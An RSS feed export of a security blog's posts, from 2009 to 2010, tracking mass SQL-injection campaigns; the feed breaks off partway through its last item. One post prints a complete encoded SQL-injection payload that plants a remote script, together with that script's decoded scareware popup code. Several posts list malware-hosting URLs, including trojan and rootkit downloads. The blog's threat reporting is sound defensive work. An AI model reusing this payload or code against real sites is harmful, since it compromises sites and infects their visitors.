<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>s3c-watch</title>
	<atom:link href="http://s3cwatch.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://s3cwatch.wordpress.com</link>
	<description>security watch</description>
	<lastBuildDate>Thu, 05 Jan 2012 07:48:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='s3cwatch.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>s3c-watch</title>
		<link>http://s3cwatch.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://s3cwatch.wordpress.com/osd.xml" title="s3c-watch" />
	<atom:link rel='hub' href='http://s3cwatch.wordpress.com/?pushpress=hub'/>
		<item>
		<title>nutcountry.ru</title>
		<link>http://s3cwatch.wordpress.com/2010/08/02/nutcountry-ru/</link>
		<comments>http://s3cwatch.wordpress.com/2010/08/02/nutcountry-ru/#comments</comments>
		<pubDate>Mon, 02 Aug 2010 13:57:10 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=189</guid>
		<description><![CDATA[sql-injection of iframe links &#8211; http://nutcountry.ru:8080/index.php?pid=13 the domain is currently not resolvable.<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=189&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>sql-injection of iframe links &#8211; http://<em>nutcountry</em>.<em>ru</em>:8080/index.php?pid=13</p>
<p>the domain is currently not resolvable.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/s3cwatch.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/s3cwatch.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/s3cwatch.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/s3cwatch.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/189/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=189&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2010/08/02/nutcountry-ru/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>google-analytiics.com</title>
		<link>http://s3cwatch.wordpress.com/2010/01/15/google-analytiics-com/</link>
		<comments>http://s3cwatch.wordpress.com/2010/01/15/google-analytiics-com/#comments</comments>
		<pubDate>Thu, 14 Jan 2010 17:00:12 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=177</guid>
		<description><![CDATA[Notice the 2 &#8216;i&#8217; in the domain? The sql-injection attack comes in the form set+variable=cast(variable+as+varchar(8000))%2Bcast( char(060)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(116)%2Bchar(121)%2Bchar(112)%2Bchar(101)%2Bchar(61)%2Bchar(34)%2Bchar(116)%2Bchar(101)%2Bchar(120)%2Bchar(116)%2Bchar(47)%2Bchar(106)%2Bchar(97)%2Bchar(118)%2Bchar(97)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(34)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(34)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(97)%2Bchar(110)%2Bchar(97)%2Bchar(108)%2Bchar(121)%2Bchar(116)%2Bchar(105)%2Bchar(105)%2Bchar(99)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(34)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000)) The string of char() can be easily decoded as &#60;script src=&#8221;http://google-analytiics.com/urchin.js&#8221; type=&#8221;text/javascript&#8221;&#62;&#60;/script&#62; The malicious javascript &#8220;urchin.js&#8221; is obtained and decoded as follows: function PopShow3() { CookieTest=navigator.cookieEnabled; if(CookieTest) { ClickUndercookie = GetCookie('clickunder2'); if (ClickUndercookie == null) { var ExpDate = [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=177&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Notice the 2 &#8216;i&#8217; in the domain?</p>
<p>The sql-injection attack comes in the form</p>
<p><code><br />
set+variable=cast(variable+as+varchar(8000))%2Bcast(</code><code><br />
char(060)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(116)%2Bchar(121)%2Bchar(112)%2Bchar(101)%2Bchar(61)%2Bchar(34)%2Bchar(116)%2Bchar(101)%2Bchar(120)%2Bchar(116)%2Bchar(47)%2Bchar(106)%2Bchar(97)%2Bchar(118)%2Bchar(97)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(34)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(34)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(97)%2Bchar(110)%2Bchar(97)%2Bchar(108)%2Bchar(121)%2Bchar(116)%2Bchar(105)%2Bchar(105)%2Bchar(99)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(34)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))</code><br />
<span id="more-177"></span></p>
<p>The string of char() can be easily decoded as</p>
<p>&lt;script src=&#8221;http://google-analytiics.com/urchin.js&#8221; type=&#8221;text/javascript&#8221;&gt;&lt;/script&gt;</p>
<p>The malicious javascript &#8220;urchin.js&#8221; is obtained and decoded as follows:<br />
<code><br />
function PopShow3() {<br />
CookieTest=navigator.cookieEnabled;<br />
if(CookieTest)<br />
{<br />
ClickUndercookie = GetCookie('clickunder2');<br />
if (ClickUndercookie == null)<br />
{<br />
var ExpDate = new Date ();<br />
ExpDate.setTime(ExpDate.getTime() + 365 * 24 * 60 * 60 * 1000);<br />
SetCookie('clickunder2','1',ExpDate, "/");<br />
window.open("javascript:location.href='http://best-youtubevideo.com/?pid=422&amp;sid=4fd257';","PopWin3","resizable=1,toolbar=1,location=1,menubar=1,status=1,scrollbars=1'");<br />
window.focus();<br />
}<br />
}<br />
}<br />
function GetCookie (name) {<br />
var arg = name + "=";<br />
var alen = arg.length;<br />
var clen = document.cookie.length;<br />
var i = 0;<br />
while (i &lt; clen) {<br />
var j = i + alen;<br />
if (document.cookie.substring(i, j) == arg)<br />
return getCookieVal (j);<br />
i = document.cookie.indexOf(" ", i) + 1;<br />
if (i == 0) break;<br />
}<br />
return null;<br />
}<br />
function SetCookie (name, value) {<br />
var argv = SetCookie.arguments;<br />
var argc = SetCookie.arguments.length;<br />
var expires = (argc &gt; 2) ? argv[2] : null;<br />
var path = (argc &gt; 3) ? argv[3] : null;<br />
var domain = (argc &gt; 4) ? argv[4] : null;<br />
var secure = (argc &gt; 5) ? argv[5] : false;<br />
document.cookie = name + "=" + escape (value) +<br />
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +<br />
((path == null) ? "" : ("; path=" + path)) +<br />
((domain == null) ? "" : ("; domain=" + domain)) +<br />
((secure == true) ? "; secure" : "");<br />
}<br />
document.onmouseup=PopShow3;</code></p>
<p>The above script opens a popup window from &#8220;best-youtubevideo.com&#8221; domain, however it is redirected to &#8220;scanner-antivirusw1.com&#8221;. This leads to scareware that scares people to install the <a href="http://www.virustotal.com/analisis/a13ce56a24a442a6c1eadc9d86d04ee345528a1ac4f6e9e9ffc5a13fd3cf840e-1263488072">malware</a>.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/s3cwatch.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/s3cwatch.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/s3cwatch.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/s3cwatch.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/177/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=177&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2010/01/15/google-analytiics-com/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>z360.net/a.js</title>
		<link>http://s3cwatch.wordpress.com/2009/09/02/z360-neta-js/</link>
		<comments>http://s3cwatch.wordpress.com/2009/09/02/z360-neta-js/#comments</comments>
		<pubDate>Tue, 01 Sep 2009 16:21:47 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=175</guid>
		<description><![CDATA[this injected script also has several associated domains dd45h.8866.org/fkzd/16.htm wm.1kfie.cn/x150/xx.html One of the exploit downloads a rootkit from d.cdwsx.com/xx/x150.css [VT Analysis]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=175&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>this injected script also has several associated domains</p>
<ul>
<li>dd45h.8866.org/fkzd/16.htm</li>
<li>wm.1kfie.cn/x150/xx.html</li>
</ul>
<p>One of the exploit downloads a rootkit from d.cdwsx.com/xx/x150.css [<a title="VT analysis" href="http://www.virustotal.com/analisis/7c197a3bb146a10a1942f08ad762e66576fff2b6d85053eadbabcb2bf1a10e4e-1251821306" target="_blank">VT Analysis</a>]</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/175/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/175/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/175/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/175/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/s3cwatch.wordpress.com/175/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/s3cwatch.wordpress.com/175/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/s3cwatch.wordpress.com/175/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/s3cwatch.wordpress.com/175/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/175/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/175/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/175/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/175/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/175/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/175/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=175&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/09/02/z360-neta-js/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>k.18xn.com/x.js</title>
		<link>http://s3cwatch.wordpress.com/2009/09/01/k-18xn-comx-js/</link>
		<comments>http://s3cwatch.wordpress.com/2009/09/01/k-18xn-comx-js/#comments</comments>
		<pubDate>Tue, 01 Sep 2009 15:58:23 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=173</guid>
		<description><![CDATA[active sql-injection attack. Injected scripts and exploits iframe to several urls such as: www.gehae.info/fox/index.html www.haerh.info/mam.exe the scripts generate some form of &#8216;time-based&#8217; parameters that probably is only available for a brief period. The trojan downloader from www.haerh.info get a list of evil programs from www.gehae.info/2.txt<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=173&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>active sql-injection attack.</p>
<p>Injected scripts and exploits iframe to several urls such as:</p>
<ul>
<li>www.gehae.info/fox/index.html</li>
<li>www.haerh.info/mam.exe</li>
</ul>
<p>the scripts generate some form of &#8216;time-based&#8217; parameters that probably is only available for a brief period.</p>
<p>The trojan downloader from www.haerh.info get a list of evil programs from www.gehae.info/2.txt</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/s3cwatch.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/s3cwatch.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/s3cwatch.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/s3cwatch.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/173/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=173&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/09/01/k-18xn-comx-js/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>a0v.org/x.js</title>
		<link>http://s3cwatch.wordpress.com/2009/07/23/a0v-orgx-js/</link>
		<comments>http://s3cwatch.wordpress.com/2009/07/23/a0v-orgx-js/#comments</comments>
		<pubDate>Thu, 23 Jul 2009 15:42:10 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=170</guid>
		<description><![CDATA[another round of sql-injection attacks. x.js calls iframe src www.jejsaj.com/ya/index.html jejsaj contains various exploits targeting among others owc 0-day realplayer msvidctl.dll the exploits download trojans from www.wowand.com<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=170&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>another round of sql-injection attacks.</p>
<p>x.js calls iframe src www.jejsaj.com/ya/index.html</p>
<p>jejsaj contains various exploits targeting among others</p>
<ul>
<li>owc 0-day</li>
<li>realplayer</li>
<li>msvidctl.dll</li>
</ul>
<p>the exploits download trojans from www.wowand.com</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/s3cwatch.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/s3cwatch.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/s3cwatch.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/s3cwatch.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/170/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/170/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/170/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=170&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/07/23/a0v-orgx-js/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>f1y.in/j.js</title>
		<link>http://s3cwatch.wordpress.com/2009/07/11/f1y-inj-js/</link>
		<comments>http://s3cwatch.wordpress.com/2009/07/11/f1y-inj-js/#comments</comments>
		<pubDate>Sat, 11 Jul 2009 04:17:26 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=166</guid>
		<description><![CDATA[another round of sql-injection attempt Update: beware of this malicious script as it is making use of OWC 0-day. Ref &#8211; http://isc.sans.org/diary.html?storyid=6811<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=166&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>another round of sql-injection attempt</p>
<p>Update: beware of this malicious script as it is making use of OWC 0-day.<br />
Ref &#8211; http://isc.sans.org/diary.html?storyid=6811</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/166/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/166/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/166/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/166/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/s3cwatch.wordpress.com/166/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/s3cwatch.wordpress.com/166/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/s3cwatch.wordpress.com/166/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/s3cwatch.wordpress.com/166/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/166/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/166/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/166/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/166/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/166/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/166/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=166&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/07/11/f1y-inj-js/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>218.213.77.96/a.js</title>
		<link>http://s3cwatch.wordpress.com/2009/05/28/218-213-77-96a-js/</link>
		<comments>http://s3cwatch.wordpress.com/2009/05/28/218-213-77-96a-js/#comments</comments>
		<pubDate>Thu, 28 May 2009 14:10:17 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=164</guid>
		<description><![CDATA[a recent round of sql-injected link. a.js links in more iframes which exploits the typical basket of exploits, targeting flash, IE7, snapshot viewer, realplayer, etc. Ultimately the exploits installs a trojan [VT analysis]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=164&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>a recent round of sql-injected link.<br />
<span id="more-164"></span>a.js links in more iframes which exploits the typical basket of exploits, targeting flash, IE7, snapshot viewer, realplayer, etc.</p>
